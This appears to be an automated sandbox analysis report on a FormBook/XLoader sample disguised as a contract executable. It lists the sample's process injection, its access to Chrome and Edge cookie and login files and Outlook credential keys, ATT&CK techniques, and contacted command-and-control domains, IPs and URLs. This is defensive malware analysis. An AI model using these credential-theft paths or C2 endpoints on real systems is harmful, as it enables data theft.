                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.draft contract for order #782334.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.draft contract for order #782334.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.4134808556.0000000003050000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2090221764.0000000001390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2089848989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4135588398.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4137334870.0000000005270000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2091993107.0000000001B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\PATHPING.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXEFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXEFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\PATHPING.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.draft contract for order #782334.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.draft contract for order #782334.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.4134808556.0000000003050000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2090221764.0000000001390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2089848989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4135588398.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4137334870.0000000005270000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2091993107.0000000001B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		412
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials113
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1546621 Sample: draft contract for order #7... Startdate: 01/11/2024 Architecture: WINDOWS Score: 100 31 www.deepfy.xyz 2->31 33 www.cmdh1c.xyz 2->33 35 19 other IPs or domains 2->35 45 Suricata IDS alerts for network traffic 2->45 47 Multi AV Scanner detection for submitted file 2->47 49 Yara detected FormBook 2->49 53 5 other signatures 2->53 10 draft contract for order #782334.exe 3 2->10         started        signatures3 51 Performs DNS queries to domains with low reputation 33->51 process4 file5 29 draft contract for order #782334.exe.log, ASCII 10->29 dropped 65 Injects a PE file into a foreign processes 10->65 14 draft contract for order #782334.exe 10->14         started        signatures6 process7 signatures8 67 Maps a DLL or memory area into another process 14->67 17 RprkEKYwQARXc.exe 14->17 injected process9 signatures10 43 Found direct / indirect Syscall (likely to bypass EDR) 17->43 20 PATHPING.EXE 13 17->20         started        process11 signatures12 55 Tries to steal Mail credentials (via file / registry access) 20->55 57 Tries to harvest and steal browser information (history, passwords, etc) 20->57 59 Modifies the context of a thread in another process (thread injection) 20->59 61 3 other signatures 20->61 23 RprkEKYwQARXc.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 official.roamimg.strawberrycdn.com 103.233.82.58, 62943, 62944, 62945 VPLSVPLSASIATH Thailand 23->37 39 www.redex.fun 185.68.16.94, 62931, 62932, 62933 UKRAINE-ASUA Ukraine 23->39 41 9 other IPs or domains 23->41 63 Found direct / indirect Syscall (likely to bypass EDR) 23->63 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                draft contract for order #782334.exe66%ReversingLabsByteCode-MSIL.Trojan.XLoader
                draft contract for order #782334.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                http://www.fontbureau.com/designersG0%URL Reputationsafe
                https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                http://www.fontbureau.com/designers/?0%URL Reputationsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://www.fontbureau.com/designers?0%URL Reputationsafe
                http://www.tiro.com0%URL Reputationsafe
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                http://www.fontbureau.com/designers0%URL Reputationsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.fonts.com0%URL Reputationsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.sakkal.com0%URL Reputationsafe
                http://www.fontbureau.com0%URL Reputationsafe
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                https://www.ecosia.org/newtab/0%URL Reputationsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                http://www.fontbureau.com/designers/cabarga.htmlN0%URL Reputationsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
                http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                http://www.fontbureau.com/designers80%URL Reputationsafe
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.dbasky.net
                		34.92.109.131
                		truefalse
                  		unknown
                  www.zoptra.info
                  		162.0.211.143
                  		truetrue
                    		unknown
                    official.roamimg.strawberrycdn.com
                    		103.233.82.58
                    		truetrue
                      		unknown
                      bocadolobopetra.net
                      		3.33.130.190
                      		truetrue
                        		unknown
                        litsgs.vip
                        		3.33.130.190
                        		truetrue
                          		unknown
                          44kdd.top
                          		38.47.232.160
                          		truetrue
                            		unknown
                            www.broork.sbs
                            		163.44.176.12
                            		truetrue
                              		unknown
                              roopiedutech.online
                              		103.191.208.137
                              		truetrue
                                		unknown
                                nutrigenfit.online
                                		195.110.124.133
                                		truetrue
                                  		unknown
                                  www.redex.fun
                                  		185.68.16.94
                                  		truetrue
                                    		unknown
                                    www.deepfy.xyz
                                    		199.59.243.227
                                    		truetrue
                                      		unknown
                                      www.7wkto5nk230724z.click
                                      		172.67.131.32
                                      		truetrue
                                        		unknown
                                        suree.bet
                                        		3.33.130.190
                                        		truetrue
                                          		unknown
                                          www.44kdd.top
                                          		unknown
                                          		unknownfalse
                                            		unknown
                                            www.abistra.store
                                            		unknown
                                            		unknownfalse
                                              		unknown
                                              www.litsgs.vip
                                              		unknown
                                              		unknownfalse
                                                		unknown
                                                www.suree.bet
                                                		unknown
                                                		unknownfalse
                                                  		unknown
                                                  www.bocadolobopetra.net
                                                  		unknown
                                                  		unknownfalse
                                                    		unknown
                                                    www.cmdh1c.xyz
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.roopiedutech.online
                                                      		unknown
                                                      		unknownfalse
                                                        		unknown
                                                        www.nutrigenfit.online
                                                        		unknown
                                                        		unknownfalse
                                                          		unknown

                                                          Contacted URLs

                                                          NameMaliciousAntivirus DetectionReputation
                                                          http://www.7wkto5nk230724z.click/c2q3/true
                                                            		unknown
                                                            http://www.suree.bet/mgme/?sn0PLN=3lL/hypx1hmyWKcZLPPjI3y0DWzdh1Mqom9U/1xhTPLquFXOEtCOjeGYhH0PH+auVNiYKnzM9W/uk3mi7YblJuOSg3EBIys+/hhk110xaMRzC++YecO4bSA=&xZa=jpgDOVH8PXW8oBA0true
                                                              		unknown
                                                              http://www.roopiedutech.online/w5is/true
                                                                		unknown
                                                                http://www.nutrigenfit.online/uhg3/true
                                                                  		unknown
                                                                  http://www.broork.sbs/51fd/true
                                                                    		unknown
                                                                    http://www.deepfy.xyz/t7p4/true
                                                                      		unknown
                                                                      http://www.7wkto5nk230724z.click/c2q3/?sn0PLN=j/0mpNm2Bsp7DIZ0lL93uSEy3O7+v2qbjKVTngZW+fxoFlp5b+1ximLQJstL0djCplBlCo8niZKHcOIqzu0BFGSn0M5MS0dRMByh0HJ4/jaoTuMehM4oDS0=&xZa=jpgDOVH8PXW8oBA0true
                                                                        		unknown
                                                                        http://www.litsgs.vip/a1y9/?xZa=jpgDOVH8PXW8oBA0&sn0PLN=iZz4I3W5iLJGfbtGmZ2CObwfByBiroJddzdGuVUGr5fdVP/mU/ghPDmzUyOVJzAbJgU0ueO9BFeqSkyyfz76yiSG65EDj9rJsjZ/uDCtsUVT8Sp7eRbdwLE=true
                                                                          		unknown
                                                                          http://www.redex.fun/pjcb/true
                                                                            		unknown
                                                                            http://www.bocadolobopetra.net/4q66/?sn0PLN=luPP4oyA+IxXa4dPaQ44uTX+yoj5Av033QMPVNIFYKC2UntJdFHOXwWAX/7zhXjIXLYqvWecISwtUHhz1+aJwbK46q/K1DU8OrPrV+gFHYeA3Gw8r5+flHs=&xZa=jpgDOVH8PXW8oBA0true
                                                                              		unknown
                                                                              http://www.44kdd.top/wh1i/?sn0PLN=NfOB86VXI4wsVz/XO9ACyDnBWrbPRq/QJ2w3Rs+6xYlcxVFOr5mbmHJ2iOb+4RiHynZrudFNXkx38yGLhxQe11Zee6oqKWgky3dD2swdesJmFdrAGLP7kwM=&xZa=jpgDOVH8PXW8oBA0true
                                                                                		unknown
                                                                                http://www.zoptra.info/icpx/true
                                                                                  		unknown
                                                                                  http://www.bocadolobopetra.net/4q66/true
                                                                                    		unknown
                                                                                    http://www.redex.fun/pjcb/?sn0PLN=mR41NwlPpWSeNv3ogRNiaiaxYZXyC1SkAJjbD/qSc2ukVSLu6jyn16P/AoWnmXjc847+20hqOz4nW3sR+UY1qAEpIZA0h6plj49hN8QYEBC/SES4lZybD8k=&xZa=jpgDOVH8PXW8oBA0true
                                                                                      		unknown
                                                                                      http://www.nutrigenfit.online/uhg3/?sn0PLN=BYkW8sJ9y3cOHNEoRxCwA5Vo4ahPFjBVLPr9x2y6ZT42IcqGpiutRD9HR4qSfel6nhfbupoEu3BM2yJdNDd6onHQNeQ4qPh2tk8usD30jryO8epkJ7XZGNI=&xZa=jpgDOVH8PXW8oBA0true
                                                                                        		unknown
                                                                                        http://www.deepfy.xyz/t7p4/?xZa=jpgDOVH8PXW8oBA0&sn0PLN=l9a7eDheKRZy9bhcTeCHdToYa6mt3ij4C0pbULzToM8sx4gmKc4u2ZHXAvhfaYH7/T0zUvL9+kkqYwdWGnSBKq2rvPWRIuzqlymkkYj2zkimPtA3jZhNuM4=true
                                                                                          		unknown
                                                                                          http://www.roopiedutech.online/w5is/?xZa=jpgDOVH8PXW8oBA0&sn0PLN=HbCgM9YcBMttwdZrXhLlY5z1HFkNRQK7DIvCaf9ftWyGunbQ91oOdhxta7T/vCia7UhAH45R/qaSwn7axWhs9/xB9a8/qr3Kz4jMxTKXhFTKb3+4TwbOFdg=true
                                                                                            		unknown
                                                                                            http://www.zoptra.info/icpx/?sn0PLN=EWEf4eOOpXzvErl7RdF5qy2I3vzfoFn6qWFMKyXoxLDqmpyGz4laiprjdpsB5hfyQE5UJ9beIy4J0yBeSjcOCjXGgmEr9dkECjGb/w9fv9zko2b6bEiJ13U=&xZa=jpgDOVH8PXW8oBA0true
                                                                                              		unknown
                                                                                              http://www.dbasky.net/qgza/false
                                                                                                		unknown
                                                                                                http://www.cmdh1c.xyz/6byd/?sn0PLN=cJlBP4gdQg33LxRaxIBB9TpDVwunrRcR6TPzX8fihpDKfN+C3z32iLCDUP2OAgtSF65Fjxsz3xegGgg43kjMMLGB+pU0EQVXDohFVmD6n/q0/xsVCvDFB+8=&xZa=jpgDOVH8PXW8oBA0true
                                                                                                  		unknown
                                                                                                  http://www.cmdh1c.xyz/6byd/true
                                                                                                    		unknown
                                                                                                    http://www.44kdd.top/wh1i/true
                                                                                                      		unknown
                                                                                                      http://www.broork.sbs/51fd/?sn0PLN=5XThc+sTNfSc1dyVCHius6QJlgyE7UD3g9QPrW9D0ZCA6InRQfgmSS7sY3ZsEANqCFm0SxAy1XScT67z0IieRfxf0Cr6BzHBArQcGKRuou4FU1nhplefNR0=&xZa=jpgDOVH8PXW8oBA0true
                                                                                                        		unknown
                                                                                                        http://www.suree.bet/mgme/true
                                                                                                          		unknown

                                                                                                          URLs from Memory and Binaries

                                                                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                                                                          https://duckduckgo.com/chrome_newtabPATHPING.EXE, 00000007.00000002.4138291556.0000000007D88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://www.fontbureau.com/designersGdraft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://duckduckgo.com/ac/?q=PATHPING.EXE, 00000007.00000002.4138291556.0000000007D88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://www.fontbureau.com/designers/?draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://cdn.adm.tools/parking-page/style.cssPATHPING.EXE, 00000007.00000002.4136306334.0000000004FD8000.00000004.10000000.00040000.00000000.sdmp, RprkEKYwQARXc.exe, 00000008.00000002.4135690068.00000000041D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            http://www.founder.com.cn/cn/bThedraft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            http://www.fontbureau.com/designers?draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            http://www.tiro.comdraft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=PATHPING.EXE, 00000007.00000002.4138291556.0000000007D88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            http://www.fontbureau.com/designersdraft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            http://www.goodfont.co.krdraft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            http://www.sajatypeworks.comdraft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            http://www.typography.netDdraft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            https://www.google.comPATHPING.EXE, 00000007.00000002.4138180842.0000000006340000.00000004.00000800.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.4136306334.00000000052FC000.00000004.10000000.00040000.00000000.sdmp, RprkEKYwQARXc.exe, 00000008.00000002.4135690068.00000000044FC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              http://www.founder.com.cn/cn/cThedraft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://www.galapagosdesign.com/staff/dennis.htmdraft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchPATHPING.EXE, 00000007.00000002.4138291556.0000000007D88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://www.galapagosdesign.com/DPleasedraft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://www.fonts.comdraft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://www.sandoll.co.krdraft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://www.urwpp.deDPleasedraft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://www.zhongyicts.com.cndraft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://www.sakkal.comdraft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmp, draft contract for order #782334.exe, 00000000.00000002.1761759486.00000000061E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://www.apache.org/licenses/LICENSE-2.0draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                http://www.fontbureau.comdraft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
